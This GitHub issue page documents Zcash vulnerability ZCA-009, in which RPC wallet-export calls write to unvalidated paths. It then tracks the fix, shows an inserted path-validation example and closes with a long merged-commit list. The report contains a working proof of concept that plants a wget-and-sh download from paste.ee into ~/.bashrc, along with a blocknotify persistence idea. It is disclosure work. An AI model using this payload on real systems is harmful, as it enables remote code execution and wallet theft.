
ZCA-009 Improper destination path validation in RPC calls allows arbitrary command execution #1497

Closed
coinspect opened this issue Oct 7, 2016 · 2 comments

Comments

@ghost ghost commented Oct 7, 2016

Authenticated RPC users can use the z_exportwallet, dumpwallet, and backupwallet methods to create or overwrite existing files in any location of the system accessible by the zcashd daemon. An attacker may be able to overwrite or create critical files, such as configuration files or scripts.
For example, the following files in Linux systems: ~/.bashrc, ~/.ssh/authorized_keys, ~/.zcash/zcash.conf.

Although the attacker does not completely control the data written, the method importprivkey can be used to set the label of transparent addresses to any text string. Setting a label is enough to achieve arbitrary command execution, as demonstrated by the PoC script below.

```python
#!/usr/bin/python
# Copy to zcash/qa/rpc-tests
from test_framework.authproxy import AuthServiceProxy, JSONRPCException
#label="\nblocknotify={wget,--no-check-certificate,https://paste.ee/r/u7b5s};{sh,u7b5s}"
label = ';{wget,--no-check-certificate,https://paste.ee/r/u7b5s};{sh,u7b5s}'
api = AuthServiceProxy('http://username:password@127.0.0.1:18232')
# The label is stored with the key and written verbatim into the export file
api.importprivkey('cPE4h5Au9xmrgc8fCQuZYC2JqqZmmy4UovTbfAy1xKQhk83kFThW',label)
# The destination path is not validated, so the export file is written here
api.z_exportwallet('/home/admin/.bashrc')
```

A shell script file is downloaded and executed the next time the node's administrator logs into the system:

```text
$ ssh admin@zcashnode
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 3.18.26-guest-4-4751b4a-x86_64 x86_64)

Last login: Fri Oct  07 15:49:35 2016 from 130.347.450.56
-bash: cPE4h5Au9xmrgc8fCQuZYC2JqqZmmy4UovTbfAy1xKQhk83kFThW: command not found
--2016-10-07 15:50:31--  https://paste.ee/r/7DVvf
Resolving paste.ee (paste.ee)... 2400:cb00:2048:1::6812:3114, 2400:cb00:2048:1::6812:3014, 104.18.48.20, ...
Connecting to paste.ee (paste.ee)|2400:cb00:2048:1::6812:3114|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: '7DVvf'
 [ <=>     ] 47 --.-K/s   in 0s
2016-10-07 15:50:31 (5.19 MB/s) - '7DVvf' saved [47]

All your coinz are belong to uz
-bash: cPPiJvCfkiYk71igZwm8TXVFe5r5ZW7E2e5spXnCEX9kvLMrBZsr: command not found
-bash: cQ6ZvfJoSNE8TXAy2LgoVok8f36gGdrAjfiVdu3sBxFTosPcBhE3: command not found
-bash: cPW4FfcTm9hYCmvrfEnspbzg5MqzbYKgsM9Yrm29v42cUWYN1L5z: command not found
-bash: cUww2V8RKDAiFi6YcEzLWb57wBb4SoT7HU2D226fwkmkLbQTRR6A: command not found
-bash: cQDRXgmuqHig7qppZf5j8Wid3zNp3V8BWF41o1ByMVE64NUha1Vh: command not found

( ... )
admin@zcash:~$ 
```

Alternatively, attackers can try to overwrite ~/.zcash/zcash.conf, including a blocknotify=command line, and execute commands every time the best block changes instead of waiting for the administrator to log in. New-line characters are escaped in the file created by z_exportwallet, but a workaround could be found.

Adversaries with RPC access can empty the wallet, but executing commands allows them to maintain access to the system and wait for the wallet balance to increase before emptying it. Executing commands also allows attackers to persist on the system and collect information to de-anonymize future transactions.

The risk is higher if zcashd's RPC interface is used in web and mobile wallet back-ends to create transactions.
Bitcoin wallet back-ends often use bitcoind's RPC with wallet functionality disabled to query public blockchain information, but we can expect the first Zcash web and mobile wallets to use zcashd's RPC with wallet functions enabled to make transactions if alternative implementations of Zcash are not available.

@bitcartel bitcartel commented Oct 7, 2016

@nathan-at-least nathan-at-least added this to the 1.0.1 stabilization milestone Oct 10, 2016
@daira daira referenced this issue Oct 25, 2016
@bitcartel bitcartel commented Dec 19, 2016

We could have a zcash.conf config option, e.g. exportfolder, where any RPC calls which accept a filename to write data to will only write that data to the folder. If the option is not set, the default is to return an error message to the user.

bitcartel added a commit to bitcartel/zcash that referenced this issue Jan 10, 2017
…d folder.

Previously the RPC interface allowed z_exportwallet, backupwallet and
dumpwallet to write data to an arbitrary filename.  ZCA-009 demonstrates
how this is vulnerable.  The resolution is to only allow data to be
written when the -exportdir has been configured.  Also filenames are
restricted to alphanumeric characters.
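Added example (not zcashd's own code) of the destination check that bitcartel's exportfolder proposal above and this commit's resolution describe: an export is refused until -exportdir is configured, the filename must be purely alphanumeric, and the result is joined onto the configured directory rather than taken from the RPC caller. The directory value, the error strings and the legacy_export_path helper (showing the pre-fix behaviour) are assumptions for illustration.

```python
import os
import re

# Constructed example: only alphanumeric filenames are accepted, which rules
# out '/', '.', '..' and home-directory expansion in the RPC argument.
FILENAME_RE = re.compile(r"^[A-Za-z0-9]+$")


class ExportRefused(Exception):
    """Raised when an RPC export request must be rejected."""


def legacy_export_path(filename):
    """Pre-fix behaviour (assumed): the RPC argument is used as the path."""
    return os.path.realpath(os.path.expanduser(filename))


def resolve_export_path(exportdir, filename):
    """Return the only path an export may be written to, or raise."""
    if not exportdir:
        raise ExportRefused("Cannot export data: -exportdir is not set")
    if not FILENAME_RE.match(filename):
        raise ExportRefused("Filename may only contain alphanumeric characters")
    base = os.path.realpath(exportdir)
    target = os.path.realpath(os.path.join(base, filename))
    # The regex already excludes traversal; this containment check is an
    # independent second guard in case the filename rule is ever relaxed.
    if os.path.commonpath([base, target]) != base:
        raise ExportRefused("Export path escapes the export directory")
    return target


def check_export(exportdir, filename):
    """Wrapper returning (True, path) if allowed, else (False, reason)."""
    try:
        return True, resolve_export_path(exportdir, filename)
    except ExportRefused as exc:
        return False, str(exc)


if __name__ == "__main__":
    # Constructed sample requests, including the path used in the PoC above.
    exportdir = "/var/lib/zcash/exports"  # assumed -exportdir value
    for req in ["/home/admin/.bashrc", "../../.ssh/authorized_keys",
                "wallet.dat", "backup2017"]:
        print(f"{req!r:32} legacy -> {legacy_export_path(req)}")
        print(f"{'':32} fixed  -> {check_export(exportdir, req)}")
```

Note that the label injection itself is untouched by this check; what changes is that the attacker-influenced file can only ever land inside -exportdir.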
@bitcartel bitcartel added the has PR label Jan 10, 2017
zkbot added a commit that referenced this issue Jan 18, 2017
…_exporting, r=ebfull

Fixes #1497 ZCA-009 by restricting export to a user defined folder and sanitizing filenames
zkbot added a commit that referenced this issue Jan 18, 2017
…_exporting, r=bitcartel

Fixes #1497 ZCA-009 by restricting export to a user defined folder and sanitizing filenames
@zkbot zkbot closed this in 9064d73 Jan 18, 2017
joshuayabut added a commit to z-classic/zclassic that referenced this issue Jan 31, 2017
* Add getlocalsolps and getnetworksolps RPC calls, show them in getmininginfo

* Add benchmark for attempting decryption of notes

* Add benchmark for incrementing note witnesses

* Add -metricsui flag to toggle between persistent screen and rolling metrics

Defaults to true if stdout is a TTY, else false.

* Add -metricsrefreshtime option

* Only show metrics by default if stdout is a TTY

* Document metrics screen options

* Fix stale comment referencing upstream block interval

* Add checkpoint at block height 15000

* Make command line option to show all debugging consistent with similar options

Most people expect a value of 1 to enable all for command line arguments.
However to do this for the -debug option you must type "-debug=".
This has been changed to allow "-debug=1" as well as "-debug=" to
enable all debug logging

* Update documentation to match the #4219 change

* Update help message to match the #4219 change

* Clarify that metrics options are only useful without -daemon and -printtoconsole

* Increase length of metrics divider

* Closes zcash#1857. Fixes bug where tx spending only notes had priority of 0.

* Closes zcash#1901. Increase default settings for the max block size when
mining and the amount of space available for priority transactions.

* Write witness caches when writing the best block

For steady-state operation, this reduces the average time between wallet disk
writes from once per block to once per hour.

On -rescan, witness caches are only written out at the end along with the best
block, increasing speed while ensuring that on-disk state is kept consistent.

Witness caches are now never recreated during a -reindex, on the assumption that
the blocks themselves are not changing (the chain is just being reconstructed),
and so the witnesses will remain valid.

Part of zcash#1749.

* Add porter dev overrides for CC, CXX, MAKE, BUILD, HOST

* Apply miniupnpc patches to enable compilation on Solaris 11

These can be removed after the next MiniUPnP release.

Closes zcash#1835.

* Closes zcash#1903. Add fee parameter to z_sendmany.

* Add an upstream miniupnpc patch revision

* Metrics - Don't exclaim unless > 1

"You have validated 0 transactions!" sounds a little less enthusiastic than intended. Also, only says "1 transaction".

* Address review comments, tweak strings

* bash-completion: Adapt for 0.12 and 0.13

 * separate completion for bitcoind and bitcoin-cli
 * remove RPC support from bitcoind completion
 * add completion for bitcoin-tx and bitcoin-qt
 * rely on autoloading of completions

* Change function names to not clash with Bitcoin, apply to correct binaries

* Add bash completion files to Debian package

* Always bash-complete the default account

* Add Zcash RPC commands to CLI argument completion

* Fixes zcash#1823. Witness anchors for input notes no longer cross block boundaries.

* Edit for grammar: "block chain"

At this point, I believe it is universally accepted that "blockchain" is one word, and should not be separated into two.

* Increase timeout as laptops on battery power have cpu throttling.

* Isolate verification to a `ProofVerifier` context object that allows verification behavior to be tuned by the caller.

* Regression test.

* Ensure cache contains valid entry when anchor is popped.

* Ensure ProofVerifier cannot be accidentally copied.

* Document behaviour of CWallet::SetBestChain

* WitnessAnchorData only needs to store one witness per JSOutPoint.

* Rename Dummy to Disabled.

* Add more tests for ProofVerifier.

* Fix indentation

* Generate JS for trydecryptnotes, make number of addresses a variable

* Add JS to second block to ensure witnesses are incremented

* ASSERT_TRUE -> ASSERT_FALSE

* Skip JoinSplit verification before the last checkpoint

Part of zcash#1749

* Gather release notes from previous release to HEAD

Also update release-process.md to replace git shortlog command with
release-notes.py script.

* Add a reindex test that fails because of a bug in decrementing witness caches

Ref: zcash#1904 (comment)

* Make the test pass by fixing the bug!

* Only check cache validity for witnesses being incremented or decremented

Fixes the bug resulting from zcash#1904.

* Update release process to check in with users who opened resolved issues

* Check that E' points are actually in G2 by ensuring they are of order r.

* Fix bug in wallet tests

* Extract block-generation wallet test code into a function

* Rewrite reindex test to check beyond the max witness cache size

* Fix bug in IncrementNoteWitness()

* Extend createjoinsplit to benchmark parallel JoinSplits

Closes zcash#1940

* Update payment API docs to recommend -rescan for fixing witness errors

* Add total number of commitments to getblockchaininfo

* Update version to 1.0.4

* Update man pages

* Release notes, authors, changelog

* Only enable getblocktemplate when wallet is enabled

* Only run wallet tests when wallet is enabled

* Add a tool for profiling the creation of JoinSplits

* Add test for IncrementalMerkleTree::size().

* Exclude test binaries from make install

Closes zcash#1943.

* Fixes zcash#1964 to catch general exception in z_sendmany and catch
exceptions as reference-to-const.

* Fixes zcash#1967 by adding age of note to z_sendmany logging.

* Scan the whole chain whenever a z-key is imported

Closes zcash#1941.

* Instruct users to run zcash-fetch-params if network params aren't available

Closes zcash#1786.

* Fixes a bug where the unsigned transaction was logged by z_sendmany
after a successful sign and send, meaning that the logged hash fragment
would be different from the txid logged by "AddToWallet".  This issue
occurred when sending from transparent addresses, as utxo inputs must be
signed.  It did not occur when sending from shielded addresses.

* Trigger metrics UI refresh on new messages

* Strip out the SECURE flag in metrics UI so message style is detected

* Add 'CreateJoinSplit' standalone utility to gitignore.

* Handle newlines in UI messages

* Suggest ./zcutil/fetch-params.sh as well

Once we improve the from-source installation docs to use 'make install', we can
revert this commit.

* Update debug categories

Closes zcash#1954.

* CreateJoinSplit: add start_profiling() call

This solves the problem of profiling output displaying nonsensical large time values.

* rpc: Implement random-cookie based authentication

When no `-rpcpassword` is specified, use a special 'cookie' file for
authentication. This file is generated with random content when the
daemon starts, and deleted when it exits. Read access to this file
controls who can access through RPC. By default this file is stored in
the data directory but it can be overridden with `-rpccookiefile`.

This is similar to Tor CookieAuthentication: see
https://www.torproject.org/docs/tor-manual.html.en

Alternative to #6258. Like that pull, this allows running bitcoind
without any manual configuration. However, daemons should ideally never write to
their configuration files, so I prefer this solution.

* Rename build-aux/m4/bitcoin_find_bdb48.m4 to remove version

Closes zcash#1622.

* Bump COPYRIGHT_YEAR from 2016 to 2017.

* Throw an error if zcash.conf is missing

An empty zcash.conf is sufficient to bypass this error.

* Show a friendly message explaining why zcashd needs a zcash.conf

* Closes zcash#1780. Result of z_getoperationstatus now sorted by creation time of operation

* Create ISSUE_TEMPLATE.md

* move template to subdirectory, fix typo, include prompt under describing issue section, include uploading file directly to github ticket as option for sharing logs

* Remove UTF-8 BOM efbbbf from zcash.conf to avoid problems with command line tools

* Closes zcash#1097 so zcash-cli now displays license info like zcashd.

LicenseInfo is refactored from init.cpp to util.cpp so that the
bitcoin-cli makefile target does not need to be modified.

* Fixes zcash#1497 ZCA-009 by restricting data exporting to user defined folder.

Previously the RPC interface allowed z_exportwallet, backupwallet and
dumpwallet to write data to an arbitrary filename.  ZCA-009 demonstrates
how this is vulnerable.  The resolution is to only allow data to be
written when the -exportdir has been configured.  Also filenames are
restricted to alphanumeric characters.

* Closes zcash#1957 by adding tx serialization size to listtransactions output.

* Fix gtest ordering broken by zcash#1949

Part of zcash#1539

* Fixes zcash#1960: z_getoperationstatus/result now includes operation details.

* Debian package lint

- Tweak description synopsis to make Debian happy
- Put bash completion files in correct directory
- Add a manpage for zcash-fetch-params

* Generate Debian control file to fix shlibs lint

* Create empty zcash.conf during performance measurements

* Create empty zcash.conf during coverage checks

Fixes regression caused by zcash#2013.

* Coverage build system tweaks

* Update walletbackup.py qa test to use -exportdir option

* Add missing header required by std::accumulate

* Increase timeout for z_sendmany transaction in wallet.py qa test

* Add test for z_importkey rescanning from beginning of chain.

* Bump version to 1.0.5.

* Update release notes and Debian package.

* V1.0.4 mac (#51)

* initial mac version of zclassic

Work in progress - 15JAN2017

more refactoring

linux refactoring fixes

osx refactoring fixes

initial win64 commit

fixup! initial win64 commit

compile libsnark with posix threads

build gtest and gmock with posix

Working build

fixup! Working build

* Windows and Linux builds ok

* fixup! Merge tag 'v1.0.5' into v1.0.5-multios

* fixup! fixup! Merge tag 'v1.0.5' into v1.0.5-multios

* fixup! fixup! fixup! Merge tag 'v1.0.5' into v1.0.5-multios

* Fix OSX compatibility with depends

* OSX Compat - Fix site_t ambiguity in json

* fixup! OSX Compat - Fix site_t ambiguity in json